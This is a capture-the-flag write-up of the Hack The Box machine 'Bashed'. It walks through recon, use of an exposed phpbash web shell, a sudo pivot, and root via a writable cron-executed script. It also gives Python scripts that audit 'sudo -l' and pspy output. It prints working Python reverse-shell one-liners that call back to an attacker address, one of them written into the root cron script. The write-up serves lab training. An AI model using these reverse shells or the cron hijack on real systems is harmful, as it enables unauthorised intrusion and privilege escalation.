# Hack The Box - Bashed Writeup

Writeup for the box Bashed in Hack The Box.

## Box Info

| OS | Difficulty |
| ----- |:---------- |
| Linux | Easy |

## Recon

### Nmap

Basic scan:

```bash
┌──(parallels㉿kali)-[~/Documents/Hack The Box/Bashed]
└─$ sudo nmap 10.10.10.68 -oA nmap/initial
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-12 13:39 CST
Nmap scan report for 10.10.10.68
Host is up (0.40s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 2.95 seconds
```

Only port 80 is open. Detailed scan of port 80 (version detection and default scripts):

```bash
┌──(parallels㉿kali)-[~/Documents/Hack The Box/Bashed]
└─$ sudo nmap -sC -sV 10.10.10.68 -p80 -oA nmap/bashed
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-12 13:40 CST
Nmap scan report for 10.10.10.68
Host is up (0.093s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Arrexel's Development Site
|_http-server-header: Apache/2.4.18 (Ubuntu)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.91 seconds
```

### Web Service - Port 80

The site:

![Screenshot 2024-10-13 01.51.57](https://hackmd.io/_uploads/r1EuD4OyJx.png)

The only content is a single post introducing phpbash. A quick search shows that [phpbash (Github Link)](https://github.com/Arrexel/phpbash?tab=readme-ov-file) is a PHP web shell, and the GitHub account that publishes it (Arrexel) matches the site title "Arrexel's Development Site", so a deployed copy is worth looking for. There is nothing else of interest on the page, so brute-force directories for further leads:

```bash
┌──(parallels㉿kali)-[~/Documents/Hack The Box/Bashed]
└─$ ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt:FUZZ -u http://10.10.10.68/FUZZ -t 100 | tee directory
<...>
       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.10.68/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 100
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

images                  [Status: 301, Size: 311, Words: 20, Lines: 10, Duration: 106ms]
css                     [Status: 301, Size: 308, Words: 20, Lines: 10, Duration: 112ms]
dev                     [Status: 301, Size: 308, Words: 20, Lines: 10, Duration: 120ms]
php                     [Status: 301, Size: 308, Words: 20, Lines: 10, Duration: 100ms]
fonts                   [Status: 301, Size: 310, Words: 20, Lines: 10, Duration: 116ms]
uploads                 [Status: 301, Size: 312, Words: 20, Lines: 10, Duration: 5140ms]
js                      [Status: 301, Size: 307, Words: 20, Lines: 10, Duration: 6160ms]
server-status           [Status: 403, Size: 299, Words: 22, Lines: 12, Duration: 94ms]
                        [Status: 200, Size: 7743, Words: 2956, Lines: 162, Duration: 96ms]
:: Progress: [30000/30000] :: Job [1/1] :: 733 req/sec :: Duration: [0:00:38] :: Errors: 2 ::
```

Browsing to `/dev` shows that directory listing is enabled on it and that the phpbash web shell has been left there:

![image](https://hackmd.io/_uploads/rJvV_4O1Jl.png)

## Shell as www-data

Clicking the link to `/dev/phpbash.php` opens the web shell, which can be used directly:

![Screenshot 2024-10-13
02.01.20](https://hackmd.io/_uploads/H1QKFNOkye.png)

Enter a reverse shell command in the phpbash web shell and catch it with `nc` to get a connection back from the target:

```bash
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.25",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
```

Once the shell arrives, upgrade it to a fully interactive tty: background `nc` with `^Z`, put the local terminal into raw mode with echo off, and bring `nc` back to the foreground:

```bash
┌──(parallels㉿kali)-[~/Documents/tools/Web Discovery/ReconSpider]
└─$ nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.10.16.25] from (UNKNOWN) [10.10.10.68] 47470
www-data@bashed:/var/www/html/dev$ ^Z
zsh: suspended  nc -nlvp 9001

┌──(parallels㉿kali)-[~/Documents/tools/Web Discovery/ReconSpider]
└─$ stty raw -echo;fg
[1]  + continued  nc -nlvp 9001
www-data@bashed:/var/www/html/dev$
```

### user.txt

```bash
www-data@bashed:/home/arrexel$ cat user.txt
b8c0cac3************************
```

## Shell as scriptmanager

Running `sudo -l` shows that www-data may run any command as scriptmanager without a password:

```bash
www-data@bashed:/home/arrexel$ sudo -l
Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL
```

Switch to scriptmanager:

```bash
www-data@bashed:/var/www/html/dev$ sudo -u scriptmanager /bin/bash
scriptmanager@bashed:/var/www/html/dev$
```

## Shell as root

Download [pspy](https://github.com/DominicBreuker/pspy?tab=readme-ov-file), transfer it to the target, and use it to watch which processes get started (pspy reads `/proc`, so it can see other users' processes, including root's cron jobs, without needing root):

```bash
┌──(parallels㉿kali)-[~/Documents/tools/Privilege Escalation]
└─$ wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64
<...>
pspy64    100%[===============================================================================>]   2.96M  5.26MB/s    in 0.6s

2024-10-13 00:54:47 (5.26 MB/s) - 'pspy64' saved [3104768/3104768]

┌──(parallels㉿kali)-[~/Documents/tools/Privilege Escalation]
└─$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
```

```bash
scriptmanager@bashed:~$ wget http://10.10.16.25:8000/pspy64
<...>
pspy64    100%[===============================================================================>]   2.96M  1.63MB/s    in 1.8s

2024-10-12 09:44:41 (1.63 MB/s) - 'pspy64' saved [3104768/3104768]

scriptmanager@bashed:~$ chmod +x pspy64
```

```bash
scriptmanager@bashed:~$ ./pspy64 | tee pspy_result
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d
<...>
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2024/10/12 09:46:22 CMD: UID=1001 PID=14874 | tee pspy_result
2024/10/12 09:46:22 CMD: UID=1001 PID=14873 | ./pspy64
<...>
2024/10/12 09:47:01 CMD: UID=0 PID=14884 | python test.py
2024/10/12 09:47:01 CMD: UID=0 PID=14883 | /bin/sh -c cd /scripts; for f in *.py; do python "$f"; done
2024/10/12 09:47:01 CMD: UID=0 PID=14882 | /usr/sbin/CRON -f
```

A cron job running as UID=0 (root) periodically executes every `.py` file under `/scripts`. Looking at that directory, `test.py` is owned by scriptmanager, so we can modify it, while `test.txt`, which `test.py` creates, is owned by root, which confirms that the script is executed with root privileges:

```bash
scriptmanager@bashed:/scripts$ ls -l
total 8
-rw-r--r-- 1 scriptmanager scriptmanager 58 Dec  4  2017 test.py
-rw-r--r-- 1 root          root          12 Oct 12 09:52 test.txt
scriptmanager@bashed:/scripts$ cat test.py
f = open("test.txt", "w")
f.write("testing 123!")
f.close
scriptmanager@bashed:/scripts$ cat test.txt
testing 123!
```

Overwrite `test.py` with a reverse shell payload (the cron job runs it with `python`, so this is plain Python source rather than a `python3 -c` one-liner), start an `nc` listener locally, and when the cron job next fires the connection comes back as root:

```bash
scriptmanager@bashed:/scripts$ echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.25",9002));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")' > test.py
```

```bash
┌──(parallels㉿kali)-[~/Documents/Hack The Box/Bashed]
└─$ nc -lvnp 9002
listening on [any] 9002 ...
connect to [10.10.16.25] from (UNKNOWN) [10.10.10.68] 39570
root@bashed:/scripts#
```

### root.txt

```bash
root@bashed:~# cat root.txt
a5067c20************************
```
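Looking back at the www-data to scriptmanager step: the single `sudo -l` rule was the whole escalation, and it is worth being able to pick such rules out of `sudo -l` output mechanically rather than by eye. The parser below is an added example written for this writeup; it is not part of the original page or of any tool used in it. It embeds the `sudo -l` output captured above as a constant so it runs offline, and `parse_sudo_l` / `risky_rules` are names chosen for this example. It handles the general `(runas_user : runas_group) TAG: command, command` rule form, not only the Bashed rule.

```python
"""Parse `sudo -l` output and flag rules that hand over another account.

Added example for the Bashed writeup, not code from the original page.
SUDO_L_OUTPUT is the `sudo -l` output captured on the box, embedded here
so the script runs offline. Function names are choices made for this example.
"""
import re

SUDO_L_OUTPUT = """\
Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL
"""

# A rule line looks like "(runas_user : runas_group) TAG1: TAG2: cmd, cmd";
# the group part and the tags are optional.
RULE_RE = re.compile(r"^\s*\((?P<user>[^:)]+?)(?:\s*:\s*(?P<group>[^)]+?))?\)\s*(?P<rest>.+)$")
TAG_RE = re.compile(
    r"^(NOPASSWD|PASSWD|SETENV|NOSETENV|NOEXEC|EXEC|LOG_INPUT|NOLOG_INPUT|"
    r"LOG_OUTPUT|NOLOG_OUTPUT|MAIL|NOMAIL|FOLLOW|NOFOLLOW):\s*"
)


def parse_sudo_l(text):
    """Return the rules after the 'User X may run ...' header.

    Each rule is a dict with runas_user, runas_group (None if absent),
    tags (list of sudoers tags) and commands (list of strings; 'ALL' means any).
    """
    rules = []
    in_rules = False
    for line in text.splitlines():
        if re.match(r"^User \S+ may run the following commands", line):
            in_rules = True
            continue
        if not in_rules:
            continue  # skip the Defaults section
        m = RULE_RE.match(line)
        if not m:
            continue
        rest = m.group("rest")
        tags = []
        while True:  # peel off leading "TAG:" tokens
            t = TAG_RE.match(rest)
            if not t:
                break
            tags.append(t.group(1))
            rest = rest[t.end():]
        # Commands are comma separated; a literal comma inside a command is not handled.
        commands = [c.strip() for c in rest.split(",") if c.strip()]
        rules.append({
            "runas_user": m.group("user").strip(),
            "runas_group": (m.group("group") or "").strip() or None,
            "tags": tags,
            "commands": commands,
        })
    return rules


def risky_rules(rules):
    """Return (rule, reasons) pairs for rules that amount to a full account takeover."""
    findings = []
    for r in rules:
        reasons = []
        if "ALL" in r["commands"]:
            reasons.append("runs any command as %s" % r["runas_user"])
        if "NOPASSWD" in r["tags"]:
            reasons.append("no password required")
        if r["runas_user"] in ("ALL", "root"):
            reasons.append("target is root")
        if reasons:
            findings.append((r, reasons))
    return findings


if __name__ == "__main__":
    for rule, reasons in risky_rules(parse_sudo_l(SUDO_L_OUTPUT)):
        print("(%s : %s) %s -> %s" % (rule["runas_user"], rule["runas_group"],
                                      " ".join(rule["commands"]), "; ".join(reasons)))
```

On the box the same check would be run as `risky_rules(parse_sudo_l(subprocess.run(["sudo", "-l"], capture_output=True, text=True).stdout))`; for the Bashed rule it reports that www-data can run any command as scriptmanager with no password, which is exactly the `sudo -u scriptmanager /bin/bash` step.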
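The root step above generalises beyond `test.py`: whenever pspy shows a root-run `cd DIR; for f in GLOB; do ...; done` loop, what matters is which files matching GLOB (and whether DIR itself, since a writable directory lets you drop a new matching file) a lower-privileged user can write. The script below automates that check. It is an added example, not part of the original writeup or of pspy: it uses the pspy lines captured above as a constructed sample, swaps `/scripts` for a temporary directory built by `build_demo_dir` so it runs offline, and decides writability from mode bits and ownership rather than `os.access`, so the answer is the same whether it is run as the target user or by root. Function names are choices made for this example.

```python
"""Find root cron loops (from pspy output) that execute files a low-privileged user can write.

Added example for the Bashed writeup, not code from the page or from pspy.
PSPY_LINES are the lines captured on the box; /scripts is replaced by a
temporary directory built by build_demo_dir so the check runs offline.
"""
import os
import re
import stat
import tempfile
from fnmatch import fnmatch

PSPY_LINES = """\
2024/10/12 09:46:22 CMD: UID=1001 PID=14874 | tee pspy_result
2024/10/12 09:46:22 CMD: UID=1001 PID=14873 | ./pspy64
2024/10/12 09:47:01 CMD: UID=0 PID=14884 | python test.py
2024/10/12 09:47:01 CMD: UID=0 PID=14883 | /bin/sh -c cd /scripts; for f in *.py; do python "$f"; done
2024/10/12 09:47:01 CMD: UID=0 PID=14882 | /usr/sbin/CRON -f
""".splitlines()

PSPY_RE = re.compile(r"CMD: UID=(?P<uid>\d+)\s+PID=(?P<pid>\d+)\s+\|\s+(?P<cmd>.*)$")
# The "cd DIR; for f in GLOB; do ...; done" shape the Bashed cron job uses.
LOOP_RE = re.compile(r"cd\s+(?P<dir>\S+?);\s*for\s+\w+\s+in\s+(?P<glob>\S+);")


def root_commands(lines):
    """Return the command strings pspy attributed to UID 0, in order."""
    out = []
    for line in lines:
        m = PSPY_RE.search(line)
        if m and int(m.group("uid")) == 0:
            out.append(m.group("cmd"))
    return out


def loop_targets(cmd):
    """If cmd is a 'cd DIR; for f in GLOB' loop, return (DIR, GLOB); else None."""
    m = LOOP_RE.search(cmd)
    return (m.group("dir"), m.group("glob")) if m else None


def writable_by(st, uid, gids):
    """Writability from ownership and mode bits only; os.access() says yes to everything when run as root."""
    mode = st.st_mode
    if st.st_uid == uid and mode & stat.S_IWUSR:
        return True
    if st.st_gid in gids and mode & stat.S_IWGRP:
        return True
    return bool(mode & stat.S_IWOTH)


def find_hijackable(directory, pattern, uid, gids):
    """Paths under directory that uid could use to hijack the loop.

    The directory itself is reported (with a trailing slash) when uid can
    create files in it, since any new file matching pattern gets executed too.
    """
    hits = []
    if writable_by(os.stat(directory), uid, gids):
        hits.append(directory + "/")
    for name in sorted(os.listdir(directory)):
        if not fnmatch(name, pattern):
            continue
        path = os.path.join(directory, name)
        st = os.stat(path)
        if stat.S_ISREG(st.st_mode) and writable_by(st, uid, gids):
            hits.append(path)
    return hits


def build_demo_dir():
    """Constructed stand-in for /scripts: a writable .py, a read-only .py and a non-.py file."""
    d = tempfile.mkdtemp(prefix="scripts_")
    os.chmod(d, 0o755)
    for name, mode in (("test.py", 0o644), ("locked.py", 0o444), ("notes.txt", 0o666)):
        p = os.path.join(d, name)
        with open(p, "w") as fh:
            fh.write("# demo\n")
        os.chmod(p, mode)
    return d


def audit(lines, directory_override=None, uid=None, gids=None):
    """Map each root-run loop command to the hijackable paths for uid (default: current user)."""
    uid = os.getuid() if uid is None else uid
    gids = (set(os.getgroups()) | {os.getgid()}) if gids is None else set(gids)
    report = {}
    for cmd in root_commands(lines):
        t = loop_targets(cmd)
        if not t:
            continue
        directory, pattern = t
        if directory_override:  # demo only: point the real cron command at the temp dir
            directory = directory_override
        report[cmd] = find_hijackable(directory, pattern, uid, gids)
    return report


if __name__ == "__main__":
    for cmd, hits in audit(PSPY_LINES, directory_override=build_demo_dir()).items():
        print(cmd)
        for h in hits:
            print("  writable:", h)
```

On the target the call is simply `audit(open("pspy_result").read().splitlines())` from the scriptmanager shell: for the Bashed cron line it would return `/scripts/test.py` (owned by scriptmanager, mode 644), which is the file overwritten above, and `/scripts/` as well if the directory is writable.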